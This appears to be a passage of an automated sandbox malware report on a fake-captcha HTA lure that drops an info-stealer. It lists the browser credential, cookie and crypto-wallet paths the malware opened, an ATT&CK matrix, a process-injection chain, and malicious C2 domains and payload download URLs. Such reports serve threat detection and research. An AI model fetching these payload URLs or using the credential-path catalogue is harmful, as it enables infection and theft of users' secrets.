              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ

              Remote Access Functionality

              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques listed per tactic column; a figure in parentheses is the numeric badge the report attaches to that technique):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: Windows Management Instrumentation (2); Native API (1); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: DLL Side-Loading (1); Process Injection (311); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (31); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (311)
              Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: File and Directory Discovery (12); System Information Discovery (33); Security Software Discovery (131); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: Archive Collected Data (1); Data from Local System (21); Screen Capture (1); Email Collection (1); Clipboard Data (2); GUI Input Capture
              Command and Control: Ingress Tool Transfer (11); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (124); Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
              Behavior Graph ID: 1573516 | Sample: Captcha.hta | Start date: 12/12/2024 | Architecture: WINDOWS | Score: 100

              Start: DNS/IP: zinc-sneark.biz; formy-spill.biz; 3 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures. Started: mshta.exe; svchost.exe
                mshta.exe: Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Bypasses PowerShell execution policy. Started: powershell.exe
                  powershell.exe: DNS/IP: 45.131.135.227, 49732, 80 RACKMARKTES Spain; 147.45.44.131, 49734, 80 FREE-NET-ASFREEnetEU Russian Federation. Dropped: C:\Users\user\AppData\Local\...\mvgjodmb.0.cs, Unicode; C:\Users\user\AppData\...\2pzvj5lc.cmdline, Unicode. Signatures: Writes to foreign memory regions; Suspicious execution chain found; Compiles code for process injection (via .Net compiler); Injects a PE file into a foreign processes. Started: RegAsm.exe; csc.exe; csc.exe; conhost.exe
                    RegAsm.exe: DNS/IP: covery-mover.biz 172.67.206.64, 443, 49737, 49738 CLOUDFLARENETUS United States. Signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
                    csc.exe: Dropped: C:\Users\user\AppData\Local\...\mvgjodmb.dll, PE32. Started: cvtres.exe
                svchost.exe: DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label
Captcha.hta | 13% | ReversingLabs | Win32.Phishing.HTMLPhisher

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll | 100% | Avira | HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll | 100% | Joe Sandbox ML | 

No Antivirus matches

Source | Detection | Scanner | Label
covery-mover.biz | 100% | URL Reputation | malware
zinc-sneark.biz | 100% | URL Reputation | malware
dwell-exclaim.biz | 100% | URL Reputation | malware
formy-spill.biz | 100% | URL Reputation | malware

Source | Detection | Scanner | Label
http://147.45.44.131/infopage/ung0.exe | 0% | Avira URL Cloud | safe
https://covery-mover.biz:443/api | 100% | Avira URL Cloud | malware
http://45.131.135.227/tbhy.ps1 | 0% | Avira URL Cloud | safe
http://147.45.44.131/infopage/bhg8.exe | 0% | Avira URL Cloud | safe
http://45.131.138 | 0% | Avira URL Cloud | safe
https://covery-mover.biz/apia | 100% | Avira URL Cloud | malware
https://covery-mover.biz/apid | 100% | Avira URL Cloud | malware
http://45.131.135.227 | 0% | Avira URL Cloud | safe
https://covery-mover.biz/ | 100% | Avira URL Cloud | malware
http://147.45.44.131 | 0% | Avira URL Cloud | safe
https://covery-mover.biz/apie. | 100% | Avira URL Cloud | malware
https://covery-mover.biz/D | 100% | Avira URL Cloud | malware
https://covery-mover.biz/api | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
covery-mover.biz | 172.67.206.64 | true | true | 100%, URL Reputation | unknown
se-blurry.biz | unknown | unknown | false | | high
zinc-sneark.biz | unknown | unknown | true | 100%, URL Reputation | unknown
dwell-exclaim.biz | unknown | unknown | true | 100%, URL Reputation | unknown
formy-spill.biz | unknown | unknown | true | 100%, URL Reputation | unknown
Name | Malicious | Antivirus Detection | Reputation
dare-curbys.biz | false | | high
impend-differ.biz | false | | high
covery-mover.biz | false | | high
http://45.131.135.227/tbhy.ps1 | true | Avira URL Cloud: safe | unknown
dwell-exclaim.biz | false | | high
http://147.45.44.131/infopage/bhg8.exe | false | Avira URL Cloud: safe | unknown
https://covery-mover.biz/api | true | Avira URL Cloud: malware | unknown
zinc-sneark.biz | false | | high
formy-spill.biz | false | | high
se-blurry.biz | false | | high
print-vexer.biz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://covery-mover.biz/ | RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.1781632412.00000000058BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://147.45.44.131/infopage/ung0.exe | powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000003.00000002.2911202163.0000027EE4A11000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.3.dr | false | | high
http://45.131.135.227 | mshta.exe, 00000000.00000003.1679927373.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1680851940.000000000082A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1677082981.0000000000829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1676018400.000000000081E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://covery-mover.biz/apia | RegAsm.exe, 00000007.00000002.1983377456.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://45.131.138 | powershell.exe, 00000001.00000002.1781632412.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://covery-mover.biz/apid | RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1781632412.0000000005236000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://covery-mover.biz:443/api | RegAsm.exe, 00000007.00000002.1983377456.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://147.45.44.131 | powershell.exe, 00000001.00000002.1781632412.000000000546C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781632412.00000000055E2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://covery-mover.biz/apie. | RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://g.live.com/odclientsettings/Prod.C: | edb.log.3.dr | false | | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.3.dr | false | | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | | high
https://aka.ms/pscore6lBdq | powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1789783027.000000000614A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://covery-mover.biz/D | RegAsm.exe, 00000007.00000002.1983377456.0000000000E23000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1781632412.00000000050E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1674729958.0000027EE4CE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
147.45.44.131 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
172.67.206.64 | covery-mover.biz | United States | 13335 | CLOUDFLARENETUS | true
45.131.135.227 | unknown | Spain | 197518 | RACKMARKTES | true

IP (private)
127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1573516
                                                                  Start date and time:2024-12-12 07:51:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 3s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:12
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Captcha.hta
                                                                  Detection:MAL
                                                                  Classification:mal100.phis.troj.spyw.expl.evad.winHTA@13/18@5/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 46
                                                                  • Number of non-executed functions: 52
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .hta
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 2.18.109.164, 4.175.87.197, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:52:02 | API Interceptor | 2x Sleep call for process: svchost.exe modified
01:52:02 | API Interceptor | 45x Sleep call for process: powershell.exe modified
01:52:13 | API Interceptor | 7x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.45.44.131 | EBUdultKh7.exe | malicious | LummaC Stealer | 147.45.44.131/infopage/vsom.exe
147.45.44.131 | MiJZ3z4t5K.exe | malicious | Unknown | 147.45.44.131/infopage/Tom.exe
147.45.44.131 | ZjH6H6xqo7.exe | malicious | LummaC | 147.45.44.131/infopage/tvh53.exe
147.45.44.131 | nlJ2sNaZVi.exe | malicious | LummaC | 147.45.44.131/infopage/tbh75.exe
147.45.44.131 | TZ33WZy6QL.exe | malicious | LummaC | 147.45.44.131/infopage/tbg9.exe
147.45.44.131 | 7IXl1M9JGV.exe | malicious | LummaC | 147.45.44.131/infopage/tbg9.exe
147.45.44.131 | 7IXl1M9JGV.exe | malicious | Unknown | 147.45.44.131/infopage/bhdh552.ps1
147.45.44.131 | Rechnung_643839483.pdf.lnk | malicious | Unknown | 147.45.44.131/infopage/cdeea.exe
147.45.44.131 | file.exe | malicious | LummaC | 147.45.44.131/files/gqgqg.exe
147.45.44.131 | AS5AB7c08n.exe | malicious | MicroClip | 147.45.44.131/files/tpgl053.exe
172.67.206.64 | https://update-download.transfernow.net/dl/20240625xVCUV6ma | malicious | HTMLPhisher | 
172.67.206.64 | https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOU | malicious | HtmlDropper, HTMLPhisher | 
Match | Associated Sample Name / URL | Detection | Threat Name | Context
covery-mover.biz | wa6qrGANga.exe | malicious | LummaC Stealer | 104.21.58.186
covery-mover.biz | file.exe | malicious | LummaC Stealer | 104.21.58.186
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | malware.ps1 | malicious | MassLogger RAT | 104.21.67.152
